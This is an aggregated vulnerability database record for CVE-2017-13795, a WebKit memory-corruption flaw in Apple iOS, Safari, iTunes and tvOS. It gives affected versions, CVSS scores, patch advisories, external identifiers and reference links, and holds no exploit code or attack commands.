vendor:	apple	model:	ios	scope:	lt	version:	11.1 (iphone 5s or later )	Trust: 0.8
vendor:	apple	model:	ios	scope:	lt	version:	11.1 (ipod touch first 6 generation )	Trust: 0.8
vendor:	apple	model:	itunes	scope:	lt	version:	for windows 12.7.1 (windows 7 or later )	Trust: 0.8
vendor:	apple	model:	safari	scope:	lt	version:	11.0.1 (macos high sierra 10.13)	Trust: 0.8
vendor:	apple	model:	safari	scope:	lt	version:	11.0.1 (macos sierra 10.12.6)	Trust: 0.8
vendor:	apple	model:	safari	scope:	lt	version:	11.0.1 (os x el capitan 10.11.6)	Trust: 0.8
vendor:	apple	model:	tvos	scope:	lt	version:	11.1 (apple tv 4k)	Trust: 0.8
vendor:	apple	model:	tvos	scope:	lt	version:	11.1 (apple tv first 4 generation )	Trust: 0.8
vendor:	apple	model:	itunes	scope:	eq	version:	4.6.0	Trust: 0.6
vendor:	apple	model:	itunes	scope:	eq	version:	6.0.5	Trust: 0.6
vendor:	apple	model:	itunes	scope:	eq	version:	4.6	Trust: 0.6
vendor:	apple	model:	itunes	scope:	eq	version:	9.0.1	Trust: 0.6
vendor:	apple	model:	itunes	scope:	eq	version:	4.7	Trust: 0.6
vendor:	apple	model:	iphone os	scope:	eq	version:	3.1	Trust: 0.6

sources: CNNVD: CNNVD-201709-094 // JVNDB: JVNDB-2017-010339 // NVD: CVE-2017-13795

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2017-13795
value:	HIGH
Trust: 1.0
NVD:	CVE-2017-13795
value:	HIGH
Trust: 0.8
CNNVD:	CNNVD-201709-094
value:	HIGH
Trust: 0.6
VULHUB:	VHN-104453
value:	MEDIUM
Trust: 0.1
VULMON:	CVE-2017-13795
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2017-13795
severity:	MEDIUM
baseScore:	6.8
vectorString:	AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.6
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
VULHUB:	VHN-104453
severity:	MEDIUM
baseScore:	6.8
vectorString:	AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.6
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2017-13795
baseSeverity:	HIGH
baseScore:	8.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	REQUIRED
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	2.8
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: VULHUB: VHN-104453 // VULMON: CVE-2017-13795 // CNNVD: CNNVD-201709-094 // JVNDB: JVNDB-2017-010339 // NVD: CVE-2017-13795

PROBLEMTYPE DATA

problemtype:

CWE-119

Trust: 1.9

sources: VULHUB: VHN-104453 // JVNDB: JVNDB-2017-010339 // NVD: CVE-2017-13795

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201709-094

TYPE

buffer error

Trust: 0.6

sources: CNNVD: CNNVD-201709-094

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-010339

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-104453 // VULMON: CVE-2017-13795

PATCH

title:	Apple security updates	url:	https://support.apple.com/en-us/HT201222	Trust: 0.8
title:	HT208223	url:	https://support.apple.com/en-us/HT208223	Trust: 0.8
title:	HT208224	url:	https://support.apple.com/en-us/HT208224	Trust: 0.8
title:	HT208225	url:	https://support.apple.com/en-us/HT208225	Trust: 0.8
title:	HT208219	url:	https://support.apple.com/en-us/HT208219	Trust: 0.8
title:	HT208222	url:	https://support.apple.com/en-us/HT208222	Trust: 0.8
title:	HT208219	url:	https://support.apple.com/ja-jp/HT208219	Trust: 0.8
title:	HT208222	url:	https://support.apple.com/ja-jp/HT208222	Trust: 0.8
title:	HT208223	url:	https://support.apple.com/ja-jp/HT208223	Trust: 0.8
title:	HT208224	url:	https://support.apple.com/ja-jp/HT208224	Trust: 0.8
title:	HT208225	url:	https://support.apple.com/ja-jp/HT208225	Trust: 0.8
title:	Multiple Apple product WebKit Security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=90662	Trust: 0.6
title:	Ubuntu Security Notice: webkit2gtk vulnerabilities	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3481-1	Trust: 0.1
title:	-	url:	https://github.com/marckwei/temp	Trust: 0.1
title:	domato	url:	https://github.com/googleprojectzero/domato	Trust: 0.1

sources: VULMON: CVE-2017-13795 // CNNVD: CNNVD-201709-094 // JVNDB: JVNDB-2017-010339

EXTERNAL IDS

db:	NVD	id:	CVE-2017-13795	Trust: 3.3
db:	SECTRACK	id:	1039703	Trust: 1.8
db:	EXPLOIT-DB	id:	43169	Trust: 1.8
db:	JVN	id:	JVNVU99000953	Trust: 0.8
db:	JVNDB	id:	JVNDB-2017-010339	Trust: 0.8
db:	CNNVD	id:	CNNVD-201709-094	Trust: 0.7
db:	PACKETSTORM	id:	145087	Trust: 0.2
db:	SEEBUG	id:	SSVID-96886	Trust: 0.1
db:	VULHUB	id:	VHN-104453	Trust: 0.1
db:	VULMON	id:	CVE-2017-13795	Trust: 0.1
db:	PACKETSTORM	id:	144947	Trust: 0.1
db:	PACKETSTORM	id:	144861	Trust: 0.1
db:	PACKETSTORM	id:	144828	Trust: 0.1
db:	PACKETSTORM	id:	145415	Trust: 0.1
db:	PACKETSTORM	id:	144830	Trust: 0.1
db:	PACKETSTORM	id:	144831	Trust: 0.1

sources: VULHUB: VHN-104453 // VULMON: CVE-2017-13795 // PACKETSTORM: 145087 // PACKETSTORM: 144947 // PACKETSTORM: 144861 // PACKETSTORM: 144828 // PACKETSTORM: 145415 // PACKETSTORM: 144830 // PACKETSTORM: 144831 // CNNVD: CNNVD-201709-094 // JVNDB: JVNDB-2017-010339 // NVD: CVE-2017-13795

REFERENCES

url:	https://www.exploit-db.com/exploits/43169/	Trust: 1.9
url:	https://security.gentoo.org/glsa/201712-01	Trust: 1.9
url:	https://support.apple.com/ht208219	Trust: 1.8
url:	https://support.apple.com/ht208222	Trust: 1.8
url:	https://support.apple.com/ht208223	Trust: 1.8
url:	https://support.apple.com/ht208224	Trust: 1.8
url:	https://support.apple.com/ht208225	Trust: 1.8
url:	http://www.securitytracker.com/id/1039703	Trust: 1.8
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13795	Trust: 1.5
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-13795	Trust: 0.8
url:	http://jvn.jp/vu/jvnvu99000953/index.html	Trust: 0.8
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13785	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13798	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13802	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13784	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13796	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13791	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13803	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13792	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13794	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13793	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13783	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13788	Trust: 0.6
url:	https://support.apple.com/kb/ht201222	Trust: 0.4
url:	https://www.apple.com/support/security/pgp/	Trust: 0.4
url:	https://cwe.mitre.org/data/definitions/119.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://usn.ubuntu.com/3481-1/	Trust: 0.1
url:	https://webkitgtk.org/security/wsa-2017-0009.html	Trust: 0.1
url:	https://webkitgtk.org/security.html	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13789	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13790	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13799	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13849	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13804	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-13080	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13788	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13795	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13796	Trust: 0.1
url:	https://security.gentoo.org/	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13803	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13798	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13791	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13794	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13785	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13792	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13793	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13783	Trust: 0.1
url:	http://creativecommons.org/licenses/by-sa/2.5	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13784	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13802	Trust: 0.1
url:	https://bugs.gentoo.org.	Trust: 0.1
url:	https://www.apple.com/itunes/download/	Trust: 0.1
url:	https://support.apple.com/ht204283	Trust: 0.1

CREDITS

Apple

Trust: 0.4

sources: PACKETSTORM: 144861 // PACKETSTORM: 144828 // PACKETSTORM: 144830 // PACKETSTORM: 144831

SOURCES

db:	VULHUB	id:	VHN-104453
db:	VULMON	id:	CVE-2017-13795
db:	PACKETSTORM	id:	145087
db:	PACKETSTORM	id:	144947
db:	PACKETSTORM	id:	144861
db:	PACKETSTORM	id:	144828
db:	PACKETSTORM	id:	145415
db:	PACKETSTORM	id:	144830
db:	PACKETSTORM	id:	144831
db:	CNNVD	id:	CNNVD-201709-094
db:	JVNDB	id:	JVNDB-2017-010339
db:	NVD	id:	CVE-2017-13795

LAST UPDATE DATE

2025-09-15T22:31:44.448000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-104453	date:	2019-03-22T00:00:00
db:	VULMON	id:	CVE-2017-13795	date:	2019-03-22T00:00:00
db:	CNNVD	id:	CNNVD-201709-094	date:	2019-03-13T00:00:00
db:	JVNDB	id:	JVNDB-2017-010339	date:	2017-12-12T00:00:00
db:	NVD	id:	CVE-2017-13795	date:	2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-104453	date:	2017-11-13T00:00:00
db:	VULMON	id:	CVE-2017-13795	date:	2017-11-13T00:00:00
db:	PACKETSTORM	id:	145087	date:	2017-11-22T15:50:02
db:	PACKETSTORM	id:	144947	date:	2017-11-10T20:22:22
db:	PACKETSTORM	id:	144861	date:	2017-11-02T23:34:42
db:	PACKETSTORM	id:	144828	date:	2017-11-01T15:44:40
db:	PACKETSTORM	id:	145415	date:	2017-12-14T22:34:00
db:	PACKETSTORM	id:	144830	date:	2017-11-01T15:48:24
db:	PACKETSTORM	id:	144831	date:	2017-11-01T15:50:11
db:	CNNVD	id:	CNNVD-201709-094	date:	2017-08-30T00:00:00
db:	JVNDB	id:	JVNDB-2017-010339	date:	2017-12-12T00:00:00
db:	NVD	id:	CVE-2017-13795	date:	2017-11-13T03:29:00.707